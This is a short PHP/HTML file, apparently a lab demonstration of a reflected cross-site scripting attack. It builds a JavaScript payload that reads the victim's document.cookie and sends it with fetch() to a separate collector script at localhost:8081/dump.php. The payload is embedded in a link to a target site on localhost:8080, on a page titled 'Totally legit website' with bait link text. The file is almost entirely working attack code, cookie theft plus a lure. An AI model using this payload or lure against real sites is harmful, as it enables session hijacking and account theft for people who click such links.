21 lines
556 B
PHP
21 lines
556 B
PHP
<?php
|
|
|
|
$payload = <<<EOS
|
|
fetch(`http://localhost:8081/dump.php?data=\${encodeURIComponent(document.cookie)}`).then(() => {window.location.href='/?name=Blegh';});
|
|
EOS
|
|
|
|
?>
|
|
|
|
<!DOCTYPE html>
|
|
<html lang="en">
|
|
<head>
|
|
<meta charset="UTF-8">
|
|
<meta http-equiv="X-UA-Compatible" content="IE=edge">
|
|
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
|
<title>Totally legit website</title>
|
|
</head>
|
|
<body>
|
|
<a href="http://localhost:8080/?name=Blegh<script><?= $payload ?></script>">This link has a nice picture</a>
|
|
</body>
|
|
</html>
|